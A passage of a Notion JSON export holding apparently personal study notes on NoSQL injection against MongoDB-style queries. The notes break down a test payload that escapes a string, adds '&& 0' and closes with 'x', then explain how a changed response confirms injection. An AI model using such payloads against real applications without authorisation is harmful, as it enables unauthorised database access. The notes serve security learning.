into.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ec-898d-cffda06c3d17","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Example:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Example:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80e3-90f4-d967561f1338","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ec-898d-cffda06c3d17"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If the backend query is doing something like:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the backend query is doing something like:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ed-a45f-cdbd00d2e54d","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ec-898d-cffda06c3d17"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == ''","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == ''","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e5-b30b-e7d96c3e8ded","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ec-898d-cffda06c3d17"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"and you supply ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"and you supply ","href":null},{"type":"text","text":{"content":"fizzy'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"fizzy'","href":null},{"type":"text","text":{"content":", it becomes:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", it becomes:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8081-8b7e-d20a408b162c","parent":{"type":"block_id","block_id":"250dc9c5-3059-80ec-898d-cffda06c3d17"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"this.category == 'fizzy' // <— string ends early!","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy' // <— string ends early!","href":null}],"language":"javascript"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8027-b133-d3c519a5861a","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Once you’re “outside” the intended string, you can add your own logic.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Once you’re “outside” the intended string, you can add your own logic.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8058-a814-f1ec848a508d","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80e4-862b-fa83ea323869","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"2. ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"2. ","href":null},{"type":"text","text":{"content":"&&","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&&","href":null},{"type":"text","text":{"content":" (logical AND operator)","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (logical AND operator)","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-807d-bad5-cac789915bdd","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"In JavaScript-like syntax (used in many MongoDB queries), ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"In JavaScript-like syntax (used in many MongoDB queries), ","href":null},{"type":"text","text":{"content":"&&","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&&","href":null},{"type":"text","text":{"content":" means “AND — both sides must be true.”","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" means “AND — both sides must be true.”","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-802d-aafb-c572901b1523","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Adding this means:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Adding this means:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80e1-8958-dcdd25bc7ea7","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-aafb-c572901b1523"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"“Evaluate what I write next as part of the logic.”","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"“Evaluate what I write next as part of the logic.”","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8019-b9d9-e358fe188341","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This lets you chain extra conditions onto the query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This lets you chain extra conditions onto the query.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80a9-9a24-db2eb4ce5782","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80ae-bfd5-c872896a4a09","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"3. The ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"3. The ","href":null},{"type":"text","text":{"content":"0","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"0","href":null},{"type":"text","text":{"content":" (false value)","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (false value)","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8048-b023-d59c82198f45","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"In most programming/database languages, ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"In most programming/database languages, ","href":null},{"type":"text","text":{"content":"0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"0","href":null},{"type":"text","text":{"content":" is treated as ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is treated as ","href":null},{"type":"text","text":{"content":"false","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"false","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8049-9906-cf428cb4e1bb","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If your injection runs, this forces the entire condition to fail.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If your injection runs, this forces the entire condition to fail.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8022-9987-f0612dccc354","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"So:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"So:","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-801d-a3cf-c888639ed0fd","parent":{"type":"block_id","block_id":"250dc9c5-3059-8022-9987-f0612dccc354"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"'fizzy' && 0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"'fizzy' && 0","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"250dc9c5-3059-806c-8be0-f23fb87b59ae","parent":{"type":"block_id","block_id":"250dc9c5-3059-8022-9987-f0612dccc354"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"will always evaluate to false.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"will always evaluate to false.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-80c3-a788-e5d0650d4dda","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This is how you test if your input actually affects the query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This is how you test if your input actually affects the query.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80f2-8f8b-ce0650b29a9e","parent":{"type":"block_id","block_id":"250dc9c5-3059-80c3-a788-e5d0650d4dda"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If you see a ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you see a ","href":null},{"type":"text","text":{"content":"different response","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"different response","href":null},{"type":"text","text":{"content":", you know you broke or modified the logic.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", you know you broke or modified the logic.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-8089-972c-d49aaf0ec470","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80b6-87f5-e6b920ebd6c8","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"4. The second ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"4. The second ","href":null},{"type":"text","text":{"content":"&&","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&&","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80fe-81f6-f037ec2bc748","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This just chains another condition, to avoid syntax errors depending on how the query is parsed.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This just chains another condition, to avoid syntax errors depending on how the query is parsed.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8086-9b21-d6e7696b76a8","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Often, the payload must “balance” things so the injected code still looks valid to the database parser.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Often, the payload must “balance” things so the injected code still looks valid to the database parser.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-808f-a328-d5c6c6c4200d","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80ca-89c4-df9bfdfb5344","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:44:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"5. The ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"5. The ","href":null},{"type":"text","text":{"content":"'x","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'x","href":null},{"type":"text","text":{"content":" at the end","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" at the end","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8022-b407-c30442540a6d","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" to close any still-open quotes and keep the query syntactically valid.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" to close any still-open quotes and keep the query syntactically valid.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8094-89bc-e77a4090b2f0","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Without this, you might cause a malformed query error rather than a clean false condition.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Without this, you might cause a malformed query error rather than a clean false condition.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8053-9463-ddba9c7c2beb","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Think of it as: “end the mess I started in a way that the database parser accepts.”","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Think of it as: “end the mess I started in a way that the database parser accepts.”","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f0-be42-d0773b5d74e5","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80ed-bae2-f0f3aa886c87","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T18:04:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Overall: ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Overall: ","href":null},{"type":"text","text":{"content":"this.category == 'fizzy' ⇒ this.category == 'fizzy' && 0 && 'x'","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"this.category == 'fizzy' ⇒ this.category == 'fizzy' && 0 && 'x'","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80eb-92e4-d2a35fbb81a0","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"'","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"'","href":null},{"type":"text","text":{"content":" → break out of the original string.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → break out of the original string.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f0-aaac-f26124153f18","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"&& 0","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&& 0","href":null},{"type":"text","text":{"content":" → add a false condition to test control.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → add a false condition to test control.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b2-8358-c6c19b50d694","parent":{"type":"block_id","block_id":"250dc9c5-3059-805d-8dfc-f0e7d31c1ec1"},"created_time":"2025-08-15T14:42:00.000Z","last_edited_time":"2025-08-15T14:42:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"&& 'x","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"&& 'x","href":null},{"type":"text","text":{"content":" → close things neatly so the database won’t reject it outright.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → close things neatly so the database won’t reject it outright.","href":null}],"color":"default"},"archived":false}]}]},{"object":"block","id":"250dc9c5-3059-8028-8817-ff37a08f34da","parent":{"type":"block_id","block_id":"24fdc9c5-3059-8095-bc4a-d0336cd40742"},"created_time":"2025-08-15T14:45:00.000Z","last_edited_time":"2025-08-15T18:10:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"4. Overriding existing conditions","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"4. Overriding existing 